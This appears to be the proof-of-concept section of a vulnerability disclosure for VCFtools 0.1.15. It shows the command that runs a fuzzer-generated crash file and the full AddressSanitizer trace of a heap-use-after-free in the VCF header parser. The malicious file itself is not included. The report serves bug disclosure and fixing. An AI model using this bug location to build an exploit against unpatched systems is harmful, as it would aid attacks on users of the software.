Proof Of Concept
Excerpt from running the malicious file against a vulnerable version compiled with ASAN:
$:~/Downloads/vcftools/git$ ASAN_SYMBOLIZER_PATH='/usr/lib/llvm-4.0/bin/llvm-symbolizer' vcftools --vcf /tmp/crashes/id\:000075\,sig\:11\,src\:000655\,op\:flip4\,pos\:102
VCFtools - 0.1.15
(C) Adam Auton and Anthony Marcketta 2009
Parameters as interpreted:
--vcf /tmp/crashes/id:000075,sig:11,src:000655,op:flip4,pos:102
=================================================================
==16428==ERROR: AddressSanitizer: heap-use-after-free on address 0xb5c0040c at pc 0x080fd3be bp 0xbf908d18 sp 0xbf9088f0
READ of size 2 at 0xb5c0040c thread T0
    #0 0x80fd3bd in __interceptor_memcmp (/usr/local/bin/vcftools+0x80fd3bd)
    #1 0xb7678e15 in std::string::compare(char const*) const (/usr/lib/i386-linux-gnu/libstdc++.so.6+0xace15)
    #2 0x8242d2e in bool std::operator==<char, std::char_traits<char>, std::allocator<char> >(std::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, char const*) /usr/bin/../lib/gcc/i686-linux-gnu/4.8/../../../../include/c++/4.8/bits/basic_string.h:2521:20
    #3 0x8242d2e in header::add_FILTER_descriptor(std::string const&, int) /home/rchiscariu/Downloads/vcftools/src/cpp/header.cpp:345
    #4 0x823cd8a in header::parse_meta(std::string const&, unsigned int&) /home/rchiscariu/Downloads/vcftools/src/cpp/header.cpp:34:17
    #5 0x847fb35 in vcf_file::read_header() /home/rchiscariu/Downloads/vcftools/src/cpp/vcf_file.cpp:62:15
    #6 0x847ef84 in vcf_file::vcf_file(parameters const&, bool) /home/rchiscariu/Downloads/vcftools/src/cpp/vcf_file.cpp:42:2
    #7 0x8488cea in main /home/rchiscariu/Downloads/vcftools/src/cpp/vcftools.cpp:31:12
    #8 0xb73a6af2 in __libc_start_main /build/eglibc-oD_LfC/eglibc-2.19/csu/libc-start.c:287
    #9 0x807057b in _start (/usr/local/bin/vcftools+0x807057b)

0xb5c0040c is located 12 bytes inside of 24-byte region [0xb5c00400,0xb5c00418)
freed by thread T0 here:
    #0 0x818d88c in operator delete(void*) (/usr/local/bin/vcftools+0x818d88c)
    #1 0xb76791aa in std::string::_Rep::_M_destroy(std::allocator<char> const&) (/usr/lib/i386-linux-gnu/libstdc++.so.6+0xad1aa)
    #2 0x8242d06 in header::add_FILTER_descriptor(std::string const&, int) /home/rchiscariu/Downloads/vcftools/src/cpp/header.cpp:344:3
    #3 0x823cd8a in header::parse_meta(std::string const&, unsigned int&) /home/rchiscariu/Downloads/vcftools/src/cpp/header.cpp:34:17
    #4 0x847fb35 in vcf_file::read_header() /home/rchiscariu/Downloads/vcftools/src/cpp/vcf_file.cpp:62:15
    #5 0x847ef84 in vcf_file::vcf_file(parameters const&, bool) /home/rchiscariu/Downloads/vcftools/src/cpp/vcf_file.cpp:42:2
    #6 0x8488cea in main /home/rchiscariu/Downloads/vcftools/src/cpp/vcftools.cpp:31:12
    #7 0xb73a6af2 in __libc_start_main /build/eglibc-oD_LfC/eglibc-2.19/csu/libc-start.c:287

previously allocated by thread T0 here:
    #0 0x818c994 in operator new(unsigned int) (/usr/local/bin/vcftools+0x818c994)
    #1 0xb7679003 in std::string::_Rep::_S_create(unsigned int, unsigned int, std::allocator<char> const&) (/usr/lib/i386-linux-gnu/libstdc++.so.6+0xad003)

SUMMARY: AddressSanitizer: heap-use-after-free (/usr/local/bin/vcftools+0x80fd3bd) in __interceptor_memcmp
Shadow bytes around the buggy address:
  0x36b80030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x36b80040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x36b80050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x36b80060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x36b80070: fa fa fa fa fa fa fa fa fa fa 00 00 00 07 fa fa
=>0x36b80080: fd[fd]fd fa fa fa fd fd fd fa fa fa 00 00 03 fa
  0x36b80090: fa fa fd fd fd fd fa fa 00 00 03 fa fa fa 00 00
  0x36b800a0: 00 00 fa fa 00 00 01 fa fa fa 00 00 00 fa fa fa
  0x36b800b0: 00 00 01 fa fa fa fd fd fd fa fa fa fd fd fd fd
  0x36b800c0: fa fa 00 00 01 fa fa fa fd fd fd fa fa fa 00 00
  0x36b800d0: 03 fa fa fa fd fd fd fd fa fa fd fd fd fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==16428==ABORTING
======================================================================